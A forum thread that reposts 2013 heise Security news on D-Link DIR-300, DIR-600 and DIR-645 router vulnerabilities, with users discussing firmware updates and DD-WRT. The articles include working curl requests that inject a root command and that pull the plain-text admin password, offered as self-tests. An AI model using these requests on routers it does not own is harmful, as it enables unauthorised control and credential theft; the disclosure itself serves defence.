Blog: Multiple Vulnerabilities in D'Link routers DIR-600 and DIR-300 (rev B)

[menotu]

via heise Security - 06 February 2013

Security expert Michael Messner has identified several holes in D-Link's DIR-300 and DIR-600 routers that allow potential attackers to execute arbitrary commands with little effort. Although current firmware versions are also affected, the router manufacturer does not appear to be planning to close the hole.

Messner describes on his blog how a simple POST parameter allows Linux commands to be executed at root level on vulnerable routers. No password or other authentication is required to do so. In a short test, The H's associates at heise Security found that many of the devices can even be accessed from the internet and managed to inject a harmless command into such a router. A real attacker could randomly exploit systems, for example to divert a router's entire internet traffic to a third-party server.

reproduce the holes in the following firmware versions:

DIR-300:

    Version 2.12, released 18 January 2012
    Version 2.13, released 7 November 2012 (current version)

DIR-600:

    Version 2.12b02, released 17 January 2012
    Version 2.13b01, released 07 November 2012
    Version 2.14b01, released 22 January 2013 (current version)

As there is virtually no way of preventing an attack at present, the most sensible solution is to decommission the affected routers – and hope that D-Link will provide security updates one day.

A port scan can be used to confirm whether a router is accessible from the internet. If it is not accessible, there is no immediate danger, but the risk that commands could be injected via CSRF remains. This can also be tested by calling

Code: [Select]

http://<router IP>/command.php
in a fresh browser session. If neither an error message nor a request to enter a password is displayed, there is a high risk that the system is, in fact, vulnerable. Users of Linux systems can also check this directly by entering a command such as

Code: [Select]

curl --data "cmd=ls" http://<router IP>/command.php
On some devices, the admin front-end runs on port 8080; in this case, something like 192.169.0.1:8080 must be entered as the router IP.

Michael Messner blog

heise

[µT6]

i asked for a firmware upgrade last year but they gave me a link to a really old version

my dir-600 is a old model so those firmwares listed there won't work, so i decided to put dd-wrt in it

http://www.dd-wrt.com/wiki/index.php/DIR-600

so far not much to report, only problem i see is that it doesn't have a log, or it is empty

http://www.youtube.com/watch?v=CUHSbKkAICI&list=PLA348D9CCB5B8A49C

[µT6]

i have been investigating about the problem and the solutions and it seems that the issue will be fixed for most models if not already fixed in a recent update version 2.15 but i won't post the link to the firmware because it seems to be regional firmware for germany

this router is very popular(dir-600), there is a bx(mine), b1, b2, b5 and c1 versions of it so the problem will be fixed soon for all regions i think

if not, then dd-wrt works well in it, at least for the dir-600 with firmware DD-WRT v24-sp2 (12/14/11) std - build 18007(the one i'm using now)

for the dir-300 seems to be a version 2.14 atm but same story as the previous, for germany only

this router(dir-300) is really old and probably out of any warranty so dd-wrt for this one is a good idea i think

[menotu]

heise Security  - 06 March 2013

D-Link fixes router vulnerabilities very quietly

In November last year D-Link fixed critical vulnerabilities in its cylinder-shaped DIR-645 wireless router, but neglected to let its customers in on the secret. Users looking for firmware updates on D-Link's US customer site for the router will come across a version 1.03, dated 21 November 2012. The change log promises enhancements for IPv6 and iOS 6 compatibility.

US customer site

There is no indication that it might contain security fixes, so if the router has been doing its job well up until now, users are unlikely to feel the need to install the update. D-Link also makes no mention of the update on its router security web page.

Search results from the vulnerability search engine SHODAN confirm this impression – of 150 routers of this model which responded to the engine's online queries, the current firmware version is installed on only six. This constitutes a problem because a security researcher has discovered that older versions have a habit of spitting out the administrator password in plain text format. All that's required is a simple curl command:

Code: [Select]

curl -d SERVICES=DEVICE.ACCOUNT http://<device ip>/getcfg.php
The H's associates at heise Security were able to reproduce the problem. D-Link has confirmed the security expert's statement that the vulnerabilities were fixed in the update to the latest firmware version. Users running a DIR-645 should therefore install the update urgently. Even where the router is not accessible from the web, users will want to ensure that non-admin users on the local network are not able to access the password with such a simple hack.

The UK site for the DIR-645 lists firmware version 1.02 b11 as the latest update, which is presumably vulnerable to the attack. Customers from the UK will therefore either have to wait until D-Link releases the update for the UK market as well or will have to install an update which might not be appropriate to their region.

UK Site

http://www.h-online.com/security/news/item/D-Link-fixes-router-vulnerabilities-very-quietly-1816873.html